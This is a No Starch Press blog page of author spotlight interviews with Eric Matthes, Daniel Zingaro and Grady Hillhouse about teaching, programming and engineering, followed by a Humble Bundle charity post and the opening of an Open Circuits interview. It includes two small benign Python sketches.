No Starch Press Blog

Livin' the Dream with Python Crash Course Author Eric Matthes


[Cover of Python Crash Course, 3rd Edition]

This Author Spotlight is on Python programmer/educator extraordinaire Eric Matthes, author of the international bestseller (now in its third edition) Python Crash Course. In the following Q&A, we discuss how reader feedback shaped the latest edition of his book, why he chose teaching over a career in physics, the importance of applying new programming concepts to your own projects, and what Eric learned about life—and coding—from riding across the U.S. on a bicycle (five times).

Eric Matthes has been writing computer programs since childhood. For over a decade, he was a high school science and math teacher, as well as a Python programming educator. He now lives in Alaska as a full-time author and informal Python evangelist, making appearances on podcasts and at events like PyCon, where he hopes to meet you in person.

No Starch Press (NSP): Almost eight years ago, you wrote what has become the most popular Python programming book in the world. Even with well over a million readers of your work, you’re known for replying to pretty much every fan who emails you. How has such a high level of audience feedback informed the second and third editions of Python Crash Course? 

Eric Matthes (EM): When people decide to read a book like Python Crash Course, they’re making a pretty significant commitment. I want to know that when people start the book, they can make it through everything that interests them. So, when someone writes to me about something that’s not working for them, I want to help them if at all possible. The teacher in me can’t help but answer people’s questions.

When I respond to questions, I look for patterns in what people are asking about. When the book first came out and I noticed multiple people asking about the same parts of the book, I’d look at those sections to see how I might revise them to avoid common points of confusion. That feedback from readers helped shape the second edition in particular. Writing the second edition gave me the chance to bring all the code in the book up to date, but also allowed me to clarify numerous sections that weren’t written as well as they could have been.

I also post resources online to address the kinds of things people ask about. For example, I posted a full set of solutions early on, because having solutions available is a huge help to independent learners. I’ve posted recommendations about what resources might be most useful to people after finishing Python Crash Course, and some thoughts about how to find your first programming job. The cheat sheets that accompany the book have been downloaded millions of times.

Overall, I spend about 10 to 20 hours a week answering questions and keeping up with updates to Python and all the libraries the projects depend on. For example, over the last two weeks I wrote a fully updated test suite for all the code in the book, which makes it easier to test any section of the book against new versions of Python and other dependencies. It surprises a lot of people to hear about all this ongoing work. I think most people assume that once a book is published, the work is done. But this is what keeps Python Crash Course relevant and effective through each new printing, and each new edition. It’s mostly joyful work that puts me in touch with people from all over the world on a regular basis.
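Eric's actual test suite isn't shown here, but the core idea of smoke-testing a book's example programs against freshly installed dependencies can be sketched in a few lines. Everything below (the function name, the directory layout, the one-script-per-file assumption) is hypothetical, not taken from the book's real tooling:

```python
# Hypothetical sketch: run every example script in a directory with the
# current interpreter and collect the ones that fail. Re-running this
# after upgrading Python or a library quickly flags broken sections.
import subprocess
import sys
from pathlib import Path

def run_examples(directory):
    """Run each .py file in `directory`; return (name, stderr) per failure."""
    failures = []
    for script in sorted(Path(directory).glob("*.py")):
        result = subprocess.run(
            [sys.executable, str(script)],
            capture_output=True,
            text=True,
            timeout=60,  # a hung script shouldn't stall the whole run
        )
        if result.returncode != 0:
            failures.append((script.name, result.stderr.strip()))
    return failures
```

A real suite would also pin and vary dependency versions (for example, with tox or a CI matrix), but even this minimal loop catches the most common breakage: an example that no longer runs at all.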


NSP: Would you share a little about how you got to where you are today? Specifically, how did you go from studying chemical engineering in college (with plans of becoming a particle physicist) to becoming a public-school teacher and, later, a full-time author?

EM: I had a really good high school chemistry class, so I started college with a major in chemical engineering. But after a semester I changed my major to physics—I just loved the quest to understand the universe at the most fundamental levels.

I loved math and science, but I also noticed how many of my peers hated those two subjects. I joined a volunteer tutoring program and noticed that most of the people who came to us for help enjoyed the same subjects I did—it was just the way they’d been taught that wasn’t working for them. That tutoring work really opened my eyes to the impact of good (and bad) teaching.

I wanted to be a particle physicist, but I didn’t want to be a student forever. I tried teaching and found that the challenge of trying to reach every student in a class was as satisfying as hard science. I never really looked back from teaching. I taught middle school math and science for seven years in New York City and then transitioned to high school when I moved to Alaska.

My father was a software engineer in the ’70s and ’80s, so I learned the basics of programming as a kid. (That was a time when people were just starting to have computers in their homes.) I was a hobbyist programmer all my life, and I’d teach intro programming classes whenever I could. In the early 2010s, I was looking for a book I could give to my more motivated students so they could work at their own pace. I was frustrated to find, however, that every book available back then was either aimed at little kids or made too many assumptions about what people already knew.

I decided to write a book that reflected the way I teach: a focus on just enough fundamentals to start doing meaningful projects. I wrote Python Crash Course for “anyone old enough to not want a kids’ book.” It has met that goal beyond my wildest hopes. When the book first came out, I got a handwritten letter from a 10-year-old who said thank you for writing a book they could learn so easily from. I regularly get emails from people in their 70s and 80s who are finally learning programming to satisfy their curiosity or to keep their minds active. And I hear from everyone in between: high school students, undergrad and graduate students, and a whole bunch of people who are already working but are looking to make a career change. These emails, and conversations at conferences, are the highlight of my writing career.


NSP: Speaking of teaching, your early career in the field is what led to a chance encounter with No Starch Press's founder, Bill Pollock, following a lightning talk you gave at PyCon in 2013 about improving education by taking ideas from the programming world. (Tough crowd!) How did your appearance at the conference result in a publishing deal, and had you been thinking about writing a book at that point in your life?

EM: I first went to PyCon in 2012 because I wanted to do something meaningful with the programming skills I’d been informally building all my life. I was starting to build some tools that would help students navigate school better, and help teachers focus on teaching well. For example, I wrote a program that ingested students’ text-based transcripts, which were really hard to read, and generated a visual transcript for each student. You could look at one of these transcripts and in 30 seconds see what a student’s strengths and weaknesses were, and what they needed to focus on in order to graduate. That project didn’t just save time—it changed the nature of many conferences with students and their families. Instead of focusing on the frustrating process of trying to decipher a transcript, the focus was on celebrating successes and how to meet ongoing needs.
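The heart of that transcript tool is a classic parse-then-summarize pipeline: turn hard-to-read text records into structured data, then compute the numbers an advisor needs at a glance. Here's a minimal sketch of that shape; the line format, field names, and grading scheme are all invented for illustration and don't reflect the real system:

```python
# Hypothetical sketch of the transcript idea: parse plain-text course
# records into structured data, then summarize graduation progress.
def parse_transcript(text):
    """Turn lines like 'Algebra I,B,1.0' into course records."""
    records = []
    for line in text.strip().splitlines():
        course, grade, credits = line.split(",")
        records.append({
            "course": course.strip(),
            "grade": grade.strip(),
            "credits": float(credits),
        })
    return records

def credits_earned(records, passing=("A", "B", "C", "D")):
    """Total credits from passing grades: the number you need at a
    glance when checking whether a student is on track to graduate."""
    return sum(r["credits"] for r in records if r["grade"] in passing)
```

The real program rendered a visual summary rather than a single number, but the same structured records would feed either output.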

I gave a lightning talk in 2013 about how we could bring the well-established concept of openness in programming into the education world, in a way that goes beyond free software. Bill was in the audience, and he’d been having his own frustrations with the school system at that time. He said something along the lines of, “I like what you have to say about education. If you ever want to write a book, feel free to submit a proposal.” Some early No Starch books had been really influential in my life, so that invitation was compelling. I got my start on Linux by reading Ubuntu for Non-Geeks.

I didn’t really want to write a book, because I was focused on those educational infrastructure projects. But when I got back from the conference, I saw a handwritten poster I had put up in my classroom. It was titled “What’s the least you need to know about programming in order to work on your own projects?” I had listed out the most fundamental concepts of programming, along with three suggestions for projects: a video game, a data visualization project, and a web app. I realized that the poster was the table of contents of the book I wished I could teach from, and I basically turned that poster into a book proposal.

I naively thought I could write the book during the summer and edit it during the following school year. That turned into two and a half years of early mornings and late nights! But it was very much worthwhile; Python Crash Course has reached a global audience that I could hardly dream of back then. I kept teaching full-time until 2019. But I couldn’t continue to teach well and write well, so I left the classroom to focus full-time on writing and programming.


NSP: While we’re on the subject of conferences, you encourage your fans to go to events like PyCon or local coding meetups—that is, places where they can benefit from taking part in some sort of Pythonista community. Why do you believe it’s important for programmers (of every skill level) to step away from their monitor and go meet people?

EM: As a programmer, especially if you’re new to the field, it’s so easy to get stuck in your own head. It’s tempting to keep telling yourself you’re not good enough yet, that when you just learn a little more you’ll be ready to meet others and talk about programming. But when you step into a Python space—a meetup, a conference, an organized online event—you’ll almost always meet people you have something in common with.

You’ll definitely meet people who know more about Python than you do. But you’ll also probably meet people who are even newer to the field than you are. You’ll find people who are working on problems you’re interested in, and you’ll be inspired in ways you just can’t predict.

Some of what you hear will go over your head, but that’s perfectly fine. The concepts you hear about but don’t understand yet will be more familiar when you come across them later in your own work. And they won’t be dry concepts then—you’ll have a face you can connect to that topic.

There’s also a fair chance you’ll make some lifelong friends, especially if you end up staying in the Python community for a while.


NSP: Given that PCC has been a bestseller for the better part of a decade, you probably come across people who read the book years ago and are now really advanced and/or professional Python programmers. Got any tips on how to continue making progress for those who only recently finished the book? Put another way: How does someone go from beginner to expert programmer, and is that even necessary in order to have success in the field of programming?

EM: That happened much faster than I thought it would! I remember talking to someone at a booth at the second conference after the book came out. They were explaining something technical about what their company does, and halfway through they realized who I was. They stopped what they were saying to share how much Python Crash Course had helped them get started in programming. Then they continued their explanation of an area of programming I hadn’t used much and didn’t fully understand. As an author, that was a very satisfying experience!

In the early days of Python, it was pretty reasonable to aim for mastery of the entire language. It wasn’t that big, and back then the community was a lot smaller as well. These days, Python is huge; it would be really hard to know every part of the language in depth. There are plenty of Python maintainers who know one part of the language well, but who wouldn’t consider themselves an expert in other areas. It’s just too big and touches too many specialized areas.

We all know what a beginner is because it’s relatively easy to define. But there’s no clear definition of “intermediate” or “advanced.” I would advise people to learn one language well enough to use it to solve meaningful, real-world problems without having to follow a step-by-step tutorial. That doesn’t mean you need to be able to write code from memory. It’s perfectly fine to look back at the tutorials and resources you’ve learned from as you’re working on your own projects.

The best advice I can give once you’ve learned the basics is to keep learning fundamental concepts, but make sure you’re applying those concepts in a variety of real-world projects. There are a lot of concepts in programming that you can’t fully make sense of until you’ve had the chance to apply them in a variety of contexts.


NSP: Let’s talk about your passion for projects, then. Python Crash Course is peppered with a number of them—including a Space Invaders–style video game—and these endeavors definitely contribute to the book’s effectiveness. Would you explain your philosophy that programmers should always have a project in mind? Bonus question: Care to share any cool projects that you are working on right now?

EM: Nobody really learns programming just to write lines of code. The code we write is only meaningful if it actually does something we (or someone else) cares about. If you have a project you’re yearning to build, you’re almost certainly going to be a more active, engaged learner. Every time a new concept comes up, you’ll ask yourself how that concept might help you implement your project. This pushes you to think more deeply about each new concept and try using it in different ways, until you start to internalize that concept.

At the same time, you probably shouldn’t just focus on one large project. It’s helpful to take on some smaller projects that you can complete, and practice the art of “finishing” a project. No codebase is perfect, so learning to recognize when a project is “good enough” is a tremendously valuable skill.

I always have a number of projects going on. I write a weekly newsletter called Mostly Python, and it consists of individual, one-off posts and series about specific topics. I’m working on a program that will convert these series into mini-ebooks. I’m working on django-simple-deploy, a project that automates configuration and deployment for Django projects. I’m slowly learning piano, and I had a hard time learning all the notes of the grand staff well enough to focus on actually playing music. I made an old-school JavaScript site that facilitates learning the notes, and after using it for two weeks, I’m now the fastest student at naming all the notes. (That really means I’m faster than a bunch of fifth graders, but it still feels good.) I’m going to polish that a bit more and then share it more widely.


NSP: Last question. A surprising detail about your life is that you’ve bicycled across the US [checks notes] five times—in fact, you quit your job at one point and lived on a bike for an entire year! Are there any lessons you learned during those hundreds (thousands?) of hours of pedaling that can be applied to the world of Python programming?

EM: Yes, it was thousands of hours of pedaling!

When I was in my 20s and had a few years of teaching behind me, everyone was focused on getting master’s degrees. I just wanted to live outside during the summer, so I biked across the US for two summers in a row. I rode across the northern states one summer and then took a southern route the next summer. Those were such good experiences, I quit my job so I could live outside for a full year. I rode from Seattle to Maine, down to Florida, over to California, and up to Alaska. I had a conviction that I’d learn more from that kind of journey than I would from getting a master’s degree, and looking back, it was definitely the right choice for me.

One thing I took away from that trip was a deep reserve of calm from having faced everything that a year of living outside brings: beautiful sunny days in wild places, sleety mountain passes, sleeping in a tent for weeks at a time with bears, and so much more. Another big life lesson was a better understanding of all the different ways people live their lives. When you travel alone for an extended period without an engine, people open up in a different way. This was before social media, smartphones, Google Maps, and photo-sharing sites. I stopped a lot to ask directions, and just talk to people on the side of the road. Mostly, I just listened—people want to tell you about the place they live, and many people want to share their life story when you’re outside and don’t have a schedule. People would say, “I wish I could just take off and live on a bike...” and then they’d open up and tell really honest stories about their lives. I think that happened a lot because people knew I was just passing through, and they’d never see me again.

I learned empathy from listening to so many different people. When I write code, I think about the people who will use what I’m making, and I consider who might be negatively impacted by whatever I contribute to. I enjoy time in front of a computer more because of the time I’ve spent far away from a computer. When I deal with stressful bugs and crashes, I remind myself, At least I’m not facing a bear alone on the side of a gravel road in the far north of British Columbia right now.

I believe most programmers benefit from having nontechnical hobbies. Anything you find meaning in away from a computer helps keep your technical work in perspective. Keeping things in perspective is really helpful in a yearslong technical career.

Finishing that trip made it easier to write a book because I had a sense of how to bring a long-term project to completion. In some sense, a 14,000-mile bike trip is nothing more than a whole bunch of individual pedal strokes. When I feel like I’ll never get to the end of a long project, I often think back to hard days of riding and remind myself that every step forward is meaningful. That’s more than just a passing thought, though. It brings back the feeling of living outside on a daily basis. I miss those days, but I’ll carry them with me for the rest of my life.

For anyone interested in hearing more about those adventures, I wrote a book about the trip a while back. It’s kind of funny to be the author of one book that’s sold over a million copies, and another that’s sold about a hundred copies. But I wrote that book more to solidify the memories than to reach a wide audience. 

Solving Problems with Algorithms-Ace Dan Zingaro


[Cover of Algorithmic Thinking, 2nd Edition]

Our latest Author Spotlight is on computer-science whiz Daniel Zingaro, author of Algorithmic Thinking as well as its soon-to-be-published second edition, and Learn to Code by Solving Problems (2021). In the following Q&A, we talk with Dan about his favorite childhood computing memory, how he went from nearly dropping out of CS classes at university to teaching them, the accessibility tools that helped him become a programmer despite being severely visually impaired, and why fellow educators should feel empowered to write books about the subjects they teach.

Daniel Zingaro, PhD, is an award-winning associate professor of Mathematical and Computational Sciences at the University of Toronto Mississauga, where he is well-known for his uniquely interactive approach to teaching, and internationally recognized for his expertise in Active Learning. In addition to writing, educating, and researching, Zingaro is one of our go-to technical editors, whose work includes Python for Kids, 2nd Edition (2022), Data Structures the Fun Way (2022), Python for Data Science (2022), and Python One-Liners (2020).

No Starch Press: Congratulations on the second edition of Algorithmic Thinking! One of the things that really makes it unique is your show-not-tell approach to teaching algorithms, where you present the problem first and then guide the reader toward finding the fastest, cleverest solution. It can’t be a coincidence that you’re also an award-winning college professor known for your “active learning” method. Did your experience as an educator influence the way you wrote the book?

Daniel Zingaro: Oh, definitely. I've learned so much about teaching from my students, and I always try to incorporate as much of that as I can into my writing. The reason I flipped the book to be "problem first, material second," rather than the opposite, is because many people are not motivated to learn abstract stuff without understanding why it might be useful or matter to them. If I can have a reader read a description of a problem and be like, "Yo! I don't know how to solve this thing," then I feel like the real learning can begin.
I've also tried to make the book inviting to students who might otherwise not feel welcome. For example, I didn't put proofs or theorems or much math in there, because I know what that stuff does to many students: "Theorem 1: let x, y, and z be ... oh hey look, a new YouTube video!" So why force students to learn in a specific way? Because we happened to learn that way? Because that's the only way to teach it? Those reasons aren't acceptable to me. Students provide constraints on how they want to learn. If we professors are all we think we're cracked up to be, let's rise to this challenge and teach under those constraints. There's no right way to teach. If someone (like, literally, I mean one person) learns from it, then it is right.

NSP: It’s hard to believe that you twice came close to dropping out of Computer Science while attending university — and nearly failed a course that you later went on to teach. But it must be true because you disclose this personal trivia to your students. Why is it important for you to be so open about your past struggles?
DZ: It's true! I really need to dig out my old transcript and post it online for students so they can see my nearly failed grade. It's very important to me to share these low points with students because many students experience low points of their own. The way I connect with the world is through humor and making personal connections. If there's anything I can share with people that helps me make these connections, then I will do it. 
My waffling on whether to drop out of Computer Science, and suffering some poor grades, offer ways for me to make these connections. How funny, right? A professor that almost failed a course? It's really too bad that it's funny – I mean, the only reason it's funny is because it's so rare. With the poor grades and other challenges, I'm fortunate to have still gotten here. But I did, somehow. I figure that maybe my struggles can somehow help someone else with their own struggles.

NSP: Let’s talk about accessible computing for a moment. A lot of our readers may be surprised to learn that you’ve been blind your entire life, which would put you in the very small category of visually impaired students who successfully learn programming and earn advanced degrees in the subject. What adaptive tools helped you overcome the challenges you faced? And, how has the level of accessibility in computing evolved?
DZ: Yep – that's why my books don't have any extraneous pictures. Or cute sidebars. Or cute icons.
The computing tools for accessibility these days are making huge advances. I use the free NVDA screen-reader to do all of my computing tasks. But looking back, the tools only helped me because my parents gave me the opportunity for the tools to help me. My parents are in the Acknowledgements section of my book because, without them, there is no book, there is no career, there is no who-knows-what-else. If you have a disability or are otherwise being excluded, then (if it's safe to do so): advocate for yourself. That's what I learned from them. Could I have advocated for myself otherwise? Could I have advocated if I didn't feel safe in Canada doing so? Probably not. That's scary. I may have worked hard, but the world gave me the opportunity for my work to mean something. How many people work even harder and never have the opportunity to benefit? That's a tragedy.
I try to use one of my lectures every year to show my students the tools that I use to teach. They're computer scientists and are going to be building tools that all of us will use in the future, so I like to show them how much accessibility matters, for real, to a real person. And I always start with a 10-minute discussion of how I hope they interpret what I'm about to show them. It seems natural for them to hear my super-fast screen-reader speech, or the handheld device I use to read Braille, and be like, "holy cow, Dan is epic!" But I'm not. The tools are epic. Actually, wait; that's not quite it. We're all epic. Many people can read or write or do amazing things. And, yeah, the way that most (non-visually impaired) people do it is different than how I do it – but at the end of the day, the technology exists and makes it so that I can do it, too.
Also, a big shout-out to everyone who cares about accessibility and/or works to make software or processes or the world in general more accessible. We need people (including ourselves) to encourage us, and we need the accessibility tools to realize that encouragement.

NSP: Another thing our readers might not know about you is that you're the technical editor behind some of our bestselling books, including Data Structures the Fun Way and the new edition of Python for Kids. Since you've already made a name for yourself as a writer, what drew you to the unsung-hero role of technical editing, and can you tell us a little about what you actually do in that regard?
DZ: I find technical editing to be quite fun. I find learning fun, and editing books helps me sharpen what I know about a particular topic, so it's kind of fun by default. I also welcome the opportunity to help authors produce even better books. It's the best when there's an author doing great work, and I can in some small way help that author even further. Sometimes I'll be editing a book and think, "dang, this is so good! Why couldn't I have written this?" But, the reason is that I couldn't write their book even if I tried. The author has a particular voice, a particular expertise. Editing permits me to revel in that expertise, to just be grateful for the fact that here we have another author who has the ability and opportunity and life circumstances to share what they know.
What I do when editing is annoy the author with every tiny improvement/possible improvement that I can think of. (No, really – ask them.) I check all of the code and text, of course, but that's not my favorite part. My favorite part is using what I know about teaching to offer suggestions where I suspect learners may get particularly stuck. A lot of the topics covered in these books are ones I haven't taught before, and even if I have, I know only a small amount about where and why learners do or do not make progress. The challenge really never goes away, that's for sure, but I welcome any opportunity to try my best to be helpful given what I do know.
NSP: Like many of our authors, you’ve been into programming since you were young. What’s your earliest memory of enjoying computing, and when did it go from being a hobby to a career path?
DZ: One of my earliest computing memories also happens to be one of my favorites. My family was trying to get me a computer loaned to us with screen-reading technology on it (as it was expensive in those days and involved several interacting software and hardware devices). We were at an assessment center to look at some models, and my dad and some employees were talking about computery stuff that I didn't understand. Honestly, all I wanted to do was play a computer game or type something funny on the screen, but the adults just kept talking. Finally they stopped and wanted me to try out three different types of computers to see which one I could best work with. I started with the first computer, typing a little story. And then I managed to do what turned out to be the best thing ever: I froze the machine. But not just a normal freeze, a hilarious freeze where the screen-reader thing kept repeating the same “ah ah ah” syllable again and again, with no way to stop it. All of the fancy computery people were trying fancy things but simply could not make it stop. I was doing my absolute best not to laugh, because I desperately wanted the chance to take home a computer that day. Eventually they gave up and had to completely shut it down by flicking the power switch. Once they did that, I just couldn't hold it in anymore and burst out laughing (while also realizing I probably blew my chance at getting them to give me a PC). But, no! It turns out that they were actually impressed that I had successfully frozen the computer, and agreed to loan it to us on the spot. Looking back, I didn't do anything impressive – probably just pressed a bunch of keys at the same time or some such nonsense.
Presently, I'd say I'm more of a teacher-person than a computer-person. Computing happens to be the thing that I can apparently teach best, but I get my true motivation from teaching in and of itself. I often catch myself learning something new and then immediately thinking about how I might teach it. Or I'll solve a computing problem and then be thinking about which chapter of a book it might serve as an example in.
NSP: You’ve been a professor at UT-Mississauga for nearly a decade now. What’s the most significant thing you’ve discovered about teaching Computer Science in all that time?
DZ: The most significant thing I've learned is that every book is total junk for a subset of students. For any one of the textbooks I use – say, a classic CS book – there is a subset of students for whom that book just doesn't work. In fact, my happiest teaching days usually involve a student telling me that my book isn't working for them. Now, it might not be their happiest day, because then I try to drag them into a two-hour conversation about why it isn’t working. But I really do want to learn from them and try to do better. And they know how passionate I am about learning, so I don't feel too bad about that!

NSP: Much like sky-diving, writing a book takes a leap of faith — and you’ve done both. What advice can you offer to fellow CS educators who have thought about becoming an author but are scared to make the jump?
DZ: I'm married now, and I'm pretty sure I signed some wedding papers that make me not allowed to skydive anymore. (I'm guessing that book-writing is still okay, though.)
I think CS educators are in a unique position to write books that teach. They have so much experience in the classroom, and I myself was surprised how much of it I was able to carry over into my writing. I'm not an algorithms researcher. I don't know a whole lot more about algorithms than what I put into the book. (You'll know that I learned new algorithm stuff if you ever see a third edition of Algorithmic Thinking!) But, you know what? I think not being an algorithms researcher was a blessing for this book. I'm not so far removed from remembering how challenging it was for me to learn these concepts the first time. And the approaches I know best are the general (not specialized) ones that are applicable to a wide variety of problems that programmers might run into in the wild. I hope readers can see in every chapter how excited I am to learn even more about algorithms, and I hope that excitement helps fuel their own excitement.
So, say you teach a web programming course. Or an architecture course. You've tuned it. Your students respond well. Who cares if you're not the foremost expert on web programming or architecture? You're a teacher who knows how to connect with students and, as such, your book is valuable.

Ride-Along with Engineer Grady Hillhouse, the Ultimate Road Trip Buddy


New year, new spotlight—and this one shines on civil engineer and YouTube star Grady Hillhouse. His first book, Engineering in Plain Sight, was released this past fall to critical acclaim. In the following Q&A, we talk with Grady about how he went from civil engineer to full-time video producer with over 3 million subscribers (hint: woodworking), why all he needed to know about science communication he learned in kindergarten, the importance of average citizens understanding how things work, and the joy of "infrastructure spotting" on the road.


Grady Hillhouse is a civil engineer and science communicator widely known for his educational video series "Practical Engineering," currently one of the largest engineering channels on YouTube, with millions of views each month. His videos, which focus on infrastructure and the human-made environment, have garnered media attention from around the world and have been featured on the Science Channel and Discovery Channel, as well as in many publications. Before producing videos full-time, Grady worked as an engineering consultant, focusing primarily on dams and hydraulic structures. He holds degrees from Texas State University and Texas A&M University.

No Starch Press: You got your bachelor’s degree in geography, then later earned a master’s degree in civil engineering, and spent nearly a decade working in the field on infrastructure projects. How did you go from that path to becoming a full-time YouTube sensation?

Grady Hillhouse: Making YouTube videos started as a hobby for me when I was given some woodworking tools. I wanted to learn to use them, and of course, I went to YouTube to watch tutorials. What I found was a community of woodworkers producing videos of their projects and sharing them with each other. I was fascinated that YouTube could be used in a social way (I had only thought of it as a search engine for videos), and I wanted to be a part of the community. Over time, I started incorporating some engineering into my woodworking videos. Eventually I realized that I really enjoy sharing my passion for and experience in engineering with others, and I decided to focus on that topic.
I continued making videos about engineering and infrastructure in my free time, and worked to make them better and better. When my first son was born, all that free time I had to make videos vanished. I was forced to make a choice between sticking with my career in engineering or finding a way to support my family with my hobby. Ultimately, I decided I could have a bigger impact on the world producing videos (and writing a book). If everything comes crashing down, I still have my engineering license to fall back on!

NSP: You clearly have a genuine passion for the built environment—it shines through in every one of your YouTube videos and all throughout the new book. So, chicken or the egg: Did this interest spring from your graduate studies and (initial) profession, or did your fervor for infrastructure influence your academic and career pursuits?
GH: I have been interested in how things work since I was a kid, but my passion for infrastructure really didn't come until college. My undergraduate classes in water resources are what led me into civil engineering, and my engineering classes opened my eyes to all the "hidden in plain sight" details of the built environment. Every class was like turning on a lamp to illuminate some innocuous part of the constructed environment that I had never noticed before, and I haven't stopped paying attention since.

NSP: Like Bill Nye and Neil deGrasse Tyson, you’re known as a “science communicator.” But one thing engineers are not typically known for is the ability to explain complex technical processes in laypeople's terms. What’s your trick for translating “engineer speak” into engaging, accessible content without dumbing it down?
GH: My wife was a kindergarten teacher when I first started working as an engineer, and I once got invited to her elementary school to give a presentation about civil engineering. I built a model that shows the different purposes of a dam and reservoir. The first presentation went really well; the kids seemed interested in what I had to say, but I noticed that I was also getting questions from the teachers. So, for the next few classes, I started paying attention to the teachers and administrators in the back as I went through my presentation, and was surprised at how attentive they were.
It slowly dawned on me over the course of those five or six presentations that, when I talked about my career to adults, I was usually trying to make myself sound smart and dignified, to avoid dumbing things down or accidentally patronizing someone. But when I was talking to students, I didn't have those pretenses.
I’ve basically spent the past 10 years reminding myself that the average adult knows just as much about civil engineering as your average kindergartner. Half of civil engineers just think about dirt and rock all day. We have no good reason to pretend to be so dignified. It’s not just how you keep the interest of a bunch of kindergartners for 15 minutes; it’s how you reach an audience on their level.

NSP: Your book is an “illustrated field guide to the constructed environment” and, indeed, the simple yet incredibly detailed illustrations of every structure being explained on the page really highlight why they should be seen as “monuments to the solutions to hundreds of practical engineering problems,” as you put it. How did these awesome little artistic renderings come about?
GH: The idea for the book was very much rooted in the idea that there are all kinds of structures and devices that we see out in the world but can’t identify, and really, can’t even do an internet search for because they are quite difficult to describe. So, each section focuses on the parts of infrastructure that you can see. Just like using a field guide to birds or plants or rocks, as you slowly start to learn the names and purposes of what you can observe, it makes being outside a lot more fun. It gives you something to pay attention to on walks or road trips.
When I was a kid, one of my favorite things to do while bored was to open an encyclopedia to a random page and read about whatever I found. I really wanted readers to use Engineering in Plain Sight the same way: just open to any page and find something interesting. I worked really hard with my graphics team at MUTI to make each of the illustrations as rich and full of detail as possible, and I'm so proud of what we came up with together.

NSP: Your book, much like your YouTube channel "Practical Engineering," has gotten an amazing response from a wide-ranging audience. And I think it's fair to say that the majority of people who pre-ordered the book or put it on their holiday wish list were not, in fact, engineers (though it's been popular in engineering circles, too). Why do you think the rest of us are so captivated by getting an inside look at how cell towers, highways, levees—the built world—actually work?
GH: It’s hard to say for sure! But, I suspect part of it is that these structures really are in plain sight. Learning something new about some seemingly mundane part of your immediate surroundings is magical. My favorite comment to get on a video is, “I didn’t even realize I was curious about this until you asked the question.”

NSP: A few months ago, you did a “Practical Engineering” video on a massive—and massively troubled—South Texas bridge project. For those who live in the area, like yourself, it’s a local issue. But your “Harbor Bridge” episode now has over 1.6 million views and nearly 3,000 comments. Do you think that helping people understand the infrastructure in their community (and how it can fail) is a way to strengthen civic engagement through a more informed citizenry?
GH: I really do believe we need to understand our connection to the constructed environment to care for it and to invest in it, which means we need to know at least a little bit about how it works. Our lives rely on many types of infrastructure: roads, bridges, dams, sewers, pipelines, retaining walls, water towers—these structures form the basic pillars of modern society. 
And the decisions we make about infrastructure—where to build it, how to pay for it, and when to maintain it—have consequences that affect everyone in powerful and fundamental ways. So, we need everyone to be involved in those decisions, not just engineers and bureaucrats. We all carry some responsibility for how the world is built around us. Investment in infrastructure requires that we value and appreciate it first, and so that's what I try to foster with my videos and the book.

NSP: In addition to opening everyone’s eyes to the feats of infrastructure that surround and support our modern lives, you’ve also introduced us to the oddly joyful pastime of “infrastructure spotting”—something you apparently still get a kick out of. In fact, you note that your “entire life is essentially a treasure hunt for all the interesting little details of the constructed world.” (I bet you’re fun on road trips!) What fuels your ongoing enthusiasm and sense of wonder for the built environment, given you literally wrote the book on the subject?

GH: In any city I visit, I want to learn where they get their water, how their electrical grid is set up, how they manage drainage and flooding and transit and wastewater, et cetera. There is so much variety in how we solve difficult challenges through infrastructure. Plus, we’re always building new things and using new technologies. So, there’s almost always something new to see wherever you go!  


With Your Help, We Raised Over $2.75M for Charity!


We’ve been partnering with our authors and Humble Bundle on special pay-what-you-want ebook deals since 2015—that’s 30 bundles to date, for those keeping score at home. As anyone who’s taken advantage of these promotions knows, the PWYW model means that you choose between various pricing tiers of titles, then decide how much of your purchase goes to charity.

This is all to say: THANK YOU. We’re fortunate to have such a generous customer base, because over the last eight years we’ve raised more than $2.75 million for two dozen nonprofits, as well as the Hacker Alliance—a 501(c)(3) created by publisher Bill Pollock to support hacker communities around the world.

From promoting digital rights and fighting censorship, to helping marginalized populations learn to code, to supporting education through the United Negro College Fund and Teach for America, we’ve done a lot of good together.

Here’s the full list of nonprofits that your charitable donations have gone towards:

  • Electronic Frontier Foundation
  • The No Starch Press Foundation 
  • Python Software Foundation 
  • Choose-Your-Own-Charity 
  • National Coalition Against Censorship 
  • Freedom of the Press Foundation 
  • Internet Security Research Group
  • Freedom to Read Foundation 
  • Book Industry Charitable Foundation
  • Girls Who Code 
  • Comic Book Legal Defense Fund
  • Covenant House
  • United Negro College Fund
  • Teach For America
  • Code-to-Learn Foundation 
  • Women Who Code, Inc. 
  • Extra Life 
  • Active Minds, Inc. 
  • Every Child a Reader
  • St. Jude Children's Research Hospital 
  • Call of Duty Endowment 
  • The Red Nose Day Fund / Comic Relief, Inc.
  • It Gets Better Project 



About Humble Bundle 

Humble Bundle sells digital content through its pay-what-you-want bundle promotions and the Humble Store. When purchasing a bundle, customers choose how much they want to pay and decide where their money goes—between the content creators, charity, and Humble Bundle. Since the company's launch in 2010, Humble Bundle has raised more than $140 million through the support of its community for a wide range of charities, providing aid for people across the world. For more information, visit the Humble Bundle website.


Cutting It Up with Open Circuits' Windell Oskay & Eric Schlaepfer


Aglow in our Author Spotlight series this month are the daring duo behind Open Circuits: The Inner Beauty of Electronic Components—Windell Oskay and Eric Schlaepfer. Their book is a truly unique photographic exploration of the astonishing design hiding in everyday electronics, and it's as awesome as it sounds. In the following Q&A, we talk with Eric and Windell about how this project came about, the ins and outs of the hardware disassembly and macro-photography feats it took to make the book, the surprises—both good and bad—that they encountered along the way, and the many challenges of cutting a cathode ray tube in two.


Eric is a hardware engineer at Google, and runs the popular Twitter account @TubeTimeUS, where he posts cross-section photos, discusses retrocomputing and reverse engineering, and investigates engineering accidents. His better-known projects are the MOnSter 6502 (the world’s largest 6502 microprocessor, made out of individual transistors) and the Snark Barker (a retro recreation of the famous Sound Blaster sound card).

Windell is the co-founder of Evil Mad Scientist Laboratories, where he designs robots and produces DIY and open source hardware “for art, education, and world domination.” A longtime photographer, he holds a B.A. in Physics and Mathematics from Lake Forest College and a Ph.D. in Physics from the University of Texas at Austin. Besides Open Circuits, he's the author of The Annotated Build-It-Yourself Science Laboratory (Maker Media, 2015).

No Starch Press: First of all, congratulations on all the hard work paying off. The response to your book has been incredible. Considering how popular cross-section pictures were when I was a kid, I guess it’s not too surprising. People still love peeking into things full of hidden complexities! But the books I remember were mostly just intricate drawings—for Open Circuits, you actually photographed real stuff that you cut in half. What inspired this project? Did you intend to add a whole new dimension to the “cutaway” genre?

